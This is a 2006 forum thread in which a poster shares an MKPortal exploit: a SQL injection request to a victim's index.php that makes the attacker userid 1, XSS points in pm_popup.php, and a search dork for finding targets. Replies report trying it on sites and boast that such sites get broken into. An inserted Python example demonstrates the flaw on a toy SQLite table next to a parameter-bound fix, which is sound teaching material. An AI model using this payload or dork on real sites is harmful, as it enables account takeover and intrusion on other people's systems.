Bigojey Posted July 7, 2006

I got this exploit from a friend. His name is Mustafa Can Bjorn, but everybody knows him as nukedx.

PS: I don't know if this exploit was given before, so please don't be angry if you already know this exploit.

Here's the exploit:

Vendor: MKPortal (http://www.mkportal.it/)
Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)
About: Via these methods a remote attacker can inject arbitrary SQL queries into the ind parameter in index.php of MKPortal. The vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at lines 35-37; as you can see, it is easy to bypass this SQL update function. Also, there is a cross-site scripting vulnerability in pm_popup.php: the parameters u1, m1, m2, m3, m4 were not sanitized properly.
Level: Critical
---
How & Example:
SQL Injection:
GET -> http://[victim]/[mkportaldir]/index.php?ind=
EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1
So with this example the remote attacker updates his session's userid to 1, and after refreshing the page he can log in as userid 1.
XSS:
GET -> http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]
---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted vendor and waiting for reply.
---
Exploit: http://www.nukedx.com/?getxpl=26
---
Dorks: "MKPortal 1.1 RC1"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=26
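
The advisory does not show the code at lines 35-37 of vb_board_functions.php, so this is an added example, not MKPortal's code and not part of the original post: it reproduces the class of bug described (a request value concatenated into the SET clause of a session UPDATE) against an in-memory SQLite table, next to the parameter-bound form that keeps the value as data. The table, column and function names and the allow-list pattern are assumptions made for illustration.

```python
import re
import sqlite3

PAYLOAD = "',userid='1"  # the ind value quoted in the advisory

def make_db():
    # Constructed stand-in for a session table; all names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE session (sessionhash TEXT PRIMARY KEY,"
               " userid INTEGER, location TEXT)")
    db.execute("INSERT INTO session VALUES ('abc123', 42, '')")
    return db

def update_unsafe(db, sessionhash, ind):
    # Vulnerable pattern: the request value is pasted into the SET clause, so
    # a quote in it ends the string and the rest is parsed as SQL.
    db.execute("UPDATE session SET location='" + ind +
               "' WHERE sessionhash='" + sessionhash + "'")

def valid_ind(ind):
    # Assumed allow-list: ind only ever needs to be a short module name.
    return re.fullmatch(r"[A-Za-z0-9_]{1,32}", ind) is not None

def update_safe(db, sessionhash, ind):
    # Bound parameters are sent as data and cannot add column assignments.
    db.execute("UPDATE session SET location=? WHERE sessionhash=?",
               (ind, sessionhash))

def row(db, sessionhash):
    # Returns (userid, location) for the given session.
    return db.execute("SELECT userid, location FROM session"
                      " WHERE sessionhash=?", (sessionhash,)).fetchone()

def demo():
    a = make_db()
    update_unsafe(a, "abc123", PAYLOAD)   # userid column is overwritten
    b = make_db()
    update_safe(b, "abc123", PAYLOAD)     # payload stored as a plain string
    return {"unsafe": row(a, "abc123"), "bound": row(b, "abc123"),
            "allowed": valid_ind(PAYLOAD)}

if __name__ == "__main__":
    print(demo())
```

Binding alone is enough to stop the SET-clause injection; the allow-list check additionally rejects the value before it reaches the database.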

Screech Posted July 7, 2006

Yeah, I found it a while ago too, and I even tried it a few days ago, but it didn't work for me.
-----------------------
Fuck, you are not a Romanian boy, I say this: I've tried this exploit but it did not work for me.

Bigojey Posted July 7, 2006

QUOTE("Xavier"):
> Yeah, I found it a while ago too, and I even tried it a few days ago, but it didn't work for me.
> -----------------------
> Fuck, you are not a Romanian boy, I say this: I've tried this exploit but it did not work for me.

Please, in English, German or Español. I hope it isn't such a negative sentence.

nos Posted July 7, 2006

It's old, man, it's old.

ghici Posted July 7, 2006

nos, what does "old" mean to you?

nos Posted July 7, 2006

After 2 weeks an exploit gets old. At least by my account, after 2 weeks all sites of this type have been broken into......